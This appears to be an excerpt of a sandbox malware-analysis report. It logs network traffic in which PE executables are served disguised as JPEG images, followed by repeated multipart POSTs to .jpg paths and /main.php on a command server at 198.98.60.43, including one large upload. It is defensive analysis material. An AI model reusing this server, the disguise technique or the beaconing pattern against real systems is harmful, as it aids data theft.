00 00 00 70 e6 04 00 50 00 00 00 c0 e6 04 00 c8 00 00 00 00 40 05 00 78 03 00 00 00 00 00 00 00 00 00 00 00 fc 04 00 d0 1d 00 00 00 50 05 00 e0 16 00 00 30 e2 04 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 88 e2 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 f0 03 00 38 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 74 d6 03 00 00 10 00 00 00 d8 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 fc fe 00 00 00 f0 03 00 00 00 01 00 00 dc 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 2c 48 00 00 00 f0 04 00 00 04 00 00 00 dc 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 78 03 00 00 00 40 05 00 00 04 00 00 00 e0 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 e0 16 00 00 00 50 05 00 00 18 00 00 00 e4 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 04 May 2021 19:35:15 GMTServer: Apache/2.4.37 (centos) OpenSSL/1.1.1c mod_fcgid/2.3.9 PHP/7.2.24Last-Modified: Thu, 06 Jun 2019 14:01:20 GMTETag: "217d0-58aa825fc8c00"Accept-Ranges: bytesContent-Length: 137168Keep-Alive: timeout=5, max=97Connection: Keep-AliveContent-Type: image/jpegData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 8d c2 55 b1 c9 a3 3b e2 c9 a3 3b e2 c9 a3 3b e2 c0 db a8 e2 d9 a3 3b e2 57 03 fc e2 cb a3 3b e2 10 c1 38 e3 c7 a3 3b e2 10 c1 3f e3 c2 a3 3b e2 10 c1 3a e3 cd a3 3b e2 10 c1 3e e3 db a3 3b e2 eb c3 3a e3 c0 a3 3b e2 c9 a3 3a e2 77 a3 3b e2 02 c0 3f e3 c8 a3 3b e2 02 c0 3e e3 dd a3 3b e2 02 c0 3b e3 c8 a3 3b e2 02 c0 c4 e2 c8 a3 3b e2 02 c0 39 e3 c8 a3 3b e2 52 69 63 68 c9 a3 3b e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 c4 5f eb 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 7a 01 00 00 86 00 00 00 00 00 00 e0 82 01 00 00 10 00 00 00 90 01 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 40 02 00 00 04 00 00 16 33 02 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 40 c0 01 00 74 1e 00 00 b4 de 01 00 2c 01 00 00 00 20 02 00 78 03 00 00 00 00 00 00 00 00 00 00 00 fa 01 00 d0 1d 00 00 00 30 02 00 68 0c 00 00 00 b9 01 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 54 b9 01 00 18 00 00 00 68 b8 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 90 01 00 f4 02 00 00 6c be 01 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 ca 78 01 00 00 10 00 00 00 7a 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 5e 65 00 00 00 90 01 00 00 66 00 00 00 7e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 bc 0b 00 00 00 00 02 00 00 02 00 00 00 e4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 64 69 64 61 74 00 00 38 00 00 00 00 10 02 00 00 02 00 00 00 e6 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 78 03 00 00 00 20 02 00 00 04 00 00 00 e8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 68 0c 00 00 00 30 02 00 00 0e 00 00 00 ec 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 04 May 2021 19:35:15 GMTServer: Apache/2.4.37 (centos) OpenSSL/1.1.1c mod_fcgid/2.3.9 PHP/7.2.24Last-Modified: Thu, 06 Jun 2019 14:01:30 GMTETag: "6b738-58aa826952280"Accept-Ranges: bytesContent-Length: 440120Keep-Alive: timeout=5, max=96Connection: Keep-AliveContent-Type: image/jpegData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a6 c8 bc 41 e2 a9 d2 12 e2 a9 d2 12 e2 a9 d2 12 56 35 3d 12 e0 a9 d2 12 eb d1 41 12 fa a9 d2 12 3b cb d3 13 e1 a9 d2 12 e2 a9 d3 12 22 a9 d2 12 3b cb d1 13 eb a9 d2 12 3b cb d6 13 ee a9 d2 12 3b cb d7 13 f4 a9 d2 12 3b cb da 13 95 a9 d2 12 3b cb d2 13 e3 a9 d2 12 3b cb 2d 12 e3 a9 d2 12 3b cb d0 13 e3 a9 d2 12 52 69 63 68 e2 a9 d2 12 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 16 38 27 59 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 04 06 00 00 82 00 00 00 00 00 00 50 b1 03 00 00 10 00 00 00 20 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 d0 06 00 00 04 00 00 61 7a 07 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 f0 43 04 00 82 cf 01 00 f4 52 06 00 2c 01 00 00 00 80 06 00 f8 03 00 00 00 00 00 00 00 00 00 00 00 78 06 00 38 3f 00 00 00 90 06 00 34 3a 00 00 f0 66 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 28 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 50 06 00 f0 02 00 00 98 40 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 72 03 06 00 00 10 00 00 00 04 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 10 28 00 00 00 20 06 00 00 18 00 00 00 08 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 36 14 00 00 00 50 06 00 00 16 00 00 00 20 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 70 06 00 00 02 00 00 00 36 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f8 03 00 00 00 80 06 00 00 04 00 00 00 38 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 34 3a 00 00 00 90 06 00 00 3c 00 00 00 3c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 04 May 2021 19:35:16 GMTServer: Apache/2.4.37 (centos) OpenSSL/1.1.1c mod_fcgid/2.3.9 PHP/7.2.24Last-Modified: Thu, 06 Jun 2019 14:01:44 GMTETag: "1303d0-58aa8276ac200"Accept-Ranges: bytesContent-Length: 1246160Keep-Alive: timeout=5, max=95Connection: Keep-AliveContent-Type: image/jpegData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 23 83 34 8c 67 e2 5a df 67 e2 5a df 67 e2 5a df 6e 9a c9 df 73 e2 5a df be 80 5b de 65 e2 5a df f9 42 9d df 63 e2 5a df be 80 59 de 6a e2 5a df be 80 5f de 6d e2 5a df be 80 5e de 6c e2 5a df 45 82 5b de 6f e2 5a df ac 81 5b de 64 e2 5a df 67 e2 5b df 90 e2 5a df ac 81 5e de 6d e3 5a df ac 81 5a de 66 e2 5a df ac 81 a5 df 66 e2 5a df ac 81 58 de 66 e2 5a df 52 69 63 68 67 e2 5a df 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 ad 62 eb 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 ea 0e 00 00 1e 04 00 00 00 00 00 77 f0 0e 00 00 10 00 00 00 00 0f 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 40 13 00 00 04 00 00 b7 bb 13 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 9d 11 00 88 a0 00 00 88 3d 12 00 54 01 00 00 00 b0 12 00 70 03 00 00 00 00 00 00 00 00 00 00 00 e6 12 00 d0 1d 00 00 00 c0 12 00 14 7d 00 00 70 97 11 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 97 11 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 0f 00 f8 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 81 e8 0e 00 00 10 00 00 00 ea 0e 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 10 52 03 00 00 00 0f 00 00 54 03 00 00 ee 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 74 47 00 00 00 60 12 00 00 22 00 00 00 42 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 70 03 00 00 00 b0 12 00 00 04 00 00 00 64 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 14 7d 00 00 00 c0 12 00 00 7e 00 00 00 68 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 04 May 2021 19:35:20 GMTServer: Apache/2.4.37 (centos) OpenSSL/1.1.1c mod_fcgid/2.3.9 PHP/7.2.24Last-Modified: Thu, 06 Jun 2019 14:02:02 GMTETag: "14748-58aa8287d6a80"Accept-Ranges: bytesContent-Length: 83784Keep-Alive: timeout=5, max=94Connection: Keep-AliveContent-Type: image/jpegData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 01 f9 a3 4e 45 98 cd 1d 45 98 cd 1d 45 98 cd 1d f1 04 22 1d 47 98 cd 1d 4c e0 5e 1d 4e 98 cd 1d 45 98 cc 1d 6c 98 cd 1d 9c fa c9 1c 55 98 cd 1d 9c fa ce 1c 56 98 cd 1d 9c fa c8 1c 41 98 cd 1d 9c fa c5 1c 5f 98 cd 1d 9c fa cd 1c 44 98 cd 1d 9c fa 32 1d 44 98 cd 1d 9c fa cf 1c 44 98 cd 1d 52 69 63 68 45 98 cd 1d 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 0c 38 27 59 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 ea 00 00 00 20 00 00 00 00 00 00 00 ae 00 00 00 10 00 00 00 00 01 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 40 01 00 00 04 00 00 bc 11 02 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 b0 f0 00 00 14 09 00 00 c0 10 01 00 8c 00 00 00 00 20 01 00 08 04 00 00 00 00 00 00 00 00 00 00 00 08 01 00 48 3f 00 00 00 30 01 00 94 0a 00 00 b0 1f 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 1f 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 bc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c4 e9 00 00 00 10 00 00 00 ea 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 44 06 00 00 00 00 01 00 00 02 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 b8 05 00 00 00 10 01 00 00 06 00 00 00 f0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 08 04 00 00 00 20 01 00 00 06 00 00 00 f6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 94 0a 00 00 00 30 01 00 00 0c 00 00 00 fc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    Source: global trafficHTTP traffic detected: POST /6.jpg HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467AContent-Length: 25Host: 198.98.60.43Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a Data Ascii: --1BEF0A57BE110FD467A--
    Source: global trafficHTTP traffic detected: POST /1.jpg HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467AContent-Length: 25Host: 198.98.60.43Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a Data Ascii: --1BEF0A57BE110FD467A--
    Source: global trafficHTTP traffic detected: POST /2.jpg HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467AContent-Length: 25Host: 198.98.60.43Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a Data Ascii: --1BEF0A57BE110FD467A--
    Source: global trafficHTTP traffic detected: POST /3.jpg HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467AContent-Length: 25Host: 198.98.60.43Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a Data Ascii: --1BEF0A57BE110FD467A--
    Source: global trafficHTTP traffic detected: POST /4.jpg HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467AContent-Length: 25Host: 198.98.60.43Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a Data Ascii: --1BEF0A57BE110FD467A--
    Source: global trafficHTTP traffic detected: POST /5.jpg HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467AContent-Length: 25Host: 198.98.60.43Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a Data Ascii: --1BEF0A57BE110FD467A--
    Source: global trafficHTTP traffic detected: POST /6.jpg HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467AContent-Length: 25Host: 198.98.60.43Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a Data Ascii: --1BEF0A57BE110FD467A--
    Source: global trafficHTTP traffic detected: POST /7.jpg HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467AContent-Length: 25Host: 198.98.60.43Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a Data Ascii: --1BEF0A57BE110FD467A--
    Source: global trafficHTTP traffic detected: POST /1.jpg HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467AContent-Length: 25Host: 198.98.60.43Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a Data Ascii: --1BEF0A57BE110FD467A--
    Source: global trafficHTTP traffic detected: POST /2.jpg HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467AContent-Length: 25Host: 198.98.60.43Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a Data Ascii: --1BEF0A57BE110FD467A--
    Source: global trafficHTTP traffic detected: POST /main.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467AContent-Length: 25Host: 198.98.60.43Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a Data Ascii: --1BEF0A57BE110FD467A--
    Source: global trafficHTTP traffic detected: POST /3.jpg HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467AContent-Length: 25Host: 198.98.60.43Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a Data Ascii: --1BEF0A57BE110FD467A--
    Source: global trafficHTTP traffic detected: POST /4.jpg HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467AContent-Length: 25Host: 198.98.60.43Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a Data Ascii: --1BEF0A57BE110FD467A--
    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467AContent-Length: 89104Host: 198.98.60.43Connection: Keep-AliveCache-Control: no-cache
    Source: global trafficHTTP traffic detected: POST /5.jpg HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467AContent-Length: 25Host: 198.98.60.43Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a Data Ascii: --1BEF0A57BE110FD467A--
    Source: global trafficHTTP traffic detected: POST /7.jpg HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467AContent-Length: 25Host: 198.98.60.43Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a Data Ascii: --1BEF0A57BE110FD467A--
    Source: Joe Sandbox ViewASN Name: PONYNETUS PONYNETUS
